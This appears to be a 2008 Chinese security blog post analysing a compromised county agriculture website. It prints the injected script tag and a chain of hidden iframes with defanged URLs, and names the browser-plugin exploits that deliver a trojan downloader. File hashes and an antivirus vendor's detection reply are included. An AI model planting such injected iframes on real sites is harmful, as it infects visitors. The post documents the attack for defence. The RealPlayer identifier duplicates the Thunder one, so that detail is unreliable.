某县农业网挂马Trojan-Downloader.Win32.ACVE.az等

某县农业网挂马Trojan-Downloader.Win32.ACVE.az等

endurer 原创
2008-10-29 第1版

该网首页包含代码：
/---
＜script c src=hxp://ads***.2*0*-1**0.cn/ad/ad.gif?id=o＞＜/script＞
---/

#1 hxxp://ads***.2*0*-1**0.cn/ad/ad.gif?id=o 包含代码：
/---
document.writeln("＜iframe src=hxxp:cc*caa**ass.cn//11//zz.htm width=100 height=0＞＜//iframe＞");
---/

#1.1 hxxp://cc*caa**ass.cn/11/zz.htm 包含代码：
/---
＜iframe src=hxxp://www*.h**ry**spal.cn/llbw/48.htm width=50 height=0 border=0＞＜/iframe＞
---/

#1.1.1 hxxp://www*.h**ry**spal.cn/llbw/41.htm 包含代码：
/---
＜Iframe src="hxxp://z*lw**rn*m*8.cn/a14/fxx.htm" width=100 height=0＞＜/Iframe＞
---/

#1.1.1.1 hxxp://z*lw**rn*m*8.cn/a14/fxx.htm
引用以下页面：

#1.1.1.1.1 hxxp://z*lw**rn*m*8.cn/a14/fx.htm
检测浏览器类型，如果是msie，则输出代码：
/---
＜iFrame src=ilink.html width=100 height=0＞＜/iframe＞
---/
否则输出代码：
/---
＜iframe src=flink.html width=100 height=0＞＜/iframe＞
---/

#1.1.1.1.1.1 hxxp://z*lw**rn*m*8.cn/a14/ilink.html
检测flashPlayer版本，并下载相应的文件：5.swf，i45.swf，i16.swf，i28.swf，i47.swf

#1.1.1.1.1.2 hxxp://z*lw**rn*m*8.cn/a14/flink.html
同上

#1.1.1.1.2 hxxp://z*lw**rn*m*8.cn/a14/ss.html
利用（snpvw.Snapshot Viewer Control.1）漏洞下载hxxp://www.*o*iuy*t*r*.net/new/a14.css

 

文件说明符 : D:/test/a14.css
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-20 19:29:8
修改时间 : 2008-10-20 19:29:8
大小 : 23761 字节 23.209 KB
MD5 : 2025eeb6666507cbbf449bb280e51430
SHA1: CD777B9660719574346098EAF7206D7507B91702
CRC32: 869c5aa2

 

主　题： RE: a14.css [KLAN-12788462]
发件人： "" <​​newvirus@kaspersky.com​​> 发送时间：2008-10-21 12:46:58

Hello,

a14.css - Trojan-Downloader.Win32.ACVE.az

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.
The answer is relevant to the latest bases from update sources.
-----------------
Regards, Vitaly Butuzov
Virus Analyst, Kaspersky Lab.

 

#1.1.1.1.3 hxxp://z*lw**rn*m*8.cn/sina.htm
/---
文件不存在
---/

#1.1.1.1.4 hxxp://z*lw**rn*m*8.cn/UU.htm

利用uusee（clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B）漏洞。

#1.1.1.1.4.1 hxxp://www.*o*iuy*t*r*.net/down/UU.ini
/---
文件不存在
---/

#1.1.1.1.4.2 hxxp://www.uusee.com/mini3/uusee_client_update/remark.php
卡巴斯基报为：Trojan-Downloader.JS.Agent.cgt 

#1.1.1.1.5 hxxp://z*lw**rn*m*8.cn/a14/Thunder.html
利用迅雷（clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F）漏洞下载hxxp://www.*o*iuy*t*r*.net/new/a14.css

#1.1.1.1.6 hxxp://z*lw**rn*m*8.cn/a14/GLWORLD.html
/---
文件不存在
---/

#1.1.1.1.7 hxxp://z*lw**rn*m*8.cn/a14/real.htm
利用RealPlayer（clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F）漏洞下载hxxp://www.*o*iuy*t*r*.net/new/a14.css

#1.1.1.1.8 hxxp://z*lw**rn*m*8.cn/a14/Real.html
同上。